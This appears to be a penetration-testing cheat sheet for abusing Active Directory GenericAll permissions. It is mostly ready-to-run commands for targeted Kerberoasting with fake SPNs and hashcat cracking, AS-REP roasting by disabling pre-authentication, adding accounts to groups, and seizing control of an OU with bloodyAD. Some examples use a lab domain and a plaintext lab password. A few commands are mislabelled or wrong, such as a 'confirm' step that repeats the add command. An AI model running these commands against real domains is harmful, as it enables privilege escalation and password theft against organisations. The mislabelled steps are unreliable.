GenericAll

Over a User

Targeted Kerberoasting

targetedKerberoast

targetedKerberoast extracts Kerberoast hashes by abusing write access to set temporary SPNs on users without one, then removes them. It works on all users, a list, or a single user:

targetedKerberoast.py -v -d '<domain>' -u '<user>' -p '<pass>' --request-user '<target-account>'

PowerShell

When a group/user has GenericAll rights over another account, a fake SPN can be assigned to the target account:

# Credentialed object for the currently owned user
> $SecPass = ConvertTo-SecureString "<password>" -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $SecPass)

# Create a fake SPN for the target user
> Set-ADUser -Identity "<target-user>" -Credential $Cred -Add @{ServicePrincipalName='fake/http'}

Once the SPN is assigned to the target account, we can Kerberoast it and crack its hash:

# Kerberoast the target account
impacket-GetUserSPNs <domain>\<username>:<password> -request-user <target-user> -dc-ip <dc-ip>

# Crack the hash
hashcat -m13100 fake_spn_hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Targeted ASREPRoasting

We can disable pre-authentication for the target account and then ASREPRoast it:

PS

# Set the preauth option to true
Set-DomainObject -Identity <USER> -XOR @{UserAccountControl=4194304}

PowerView

# Set the preauth option to true
Get-ADUser <USER> | Set-ADAccountControl -doesnotrequirepreauth $true
# Confirm that it worked
Get-ADUSer -Filter 'DoesNotRequirePreAuth -eq $true'

An example of the above method can be found here.

Change user's password

See here.

Over a Group

Add User to the Group

This can be done using native commands, the AD PS module, or PowerView.

PowerView.py

# connect to the DC
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
# add user to the group
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
# confirm group membership
PV > Get-DomainGroupMember -Identity servicemgmt

PowerView

# Adding user to the group
Add-ADGroupMember -Identity '<GROUP>' -Members <USER>
# Adding user to the group (using another user's creds)
Add-DomainGroupMember -Identity 'Core Staff' -Members 'jdgodd' -Credential $Cred -Verbose 
# Confirming group membership
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'

net

# add user to the group
net group <GROUP> <USER> /add /domain
# confirm group membership
net group <GROUP> /domain
# Clean up by removing the account from the group
net group <GROUP> <USER> /del /domain

Over an OU

If a group has GenericAll rights over an OU, then the group members can be assigned GenericAll rights over the OU as well, which results in them having FullControl over the OU members. This gives the ability to change any OU user's password.

bloodyAD

# give oorend GenericAll rights over the Service Users OU
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
# confirm FullControl over OU members (winrm_svc)
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
PV > Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"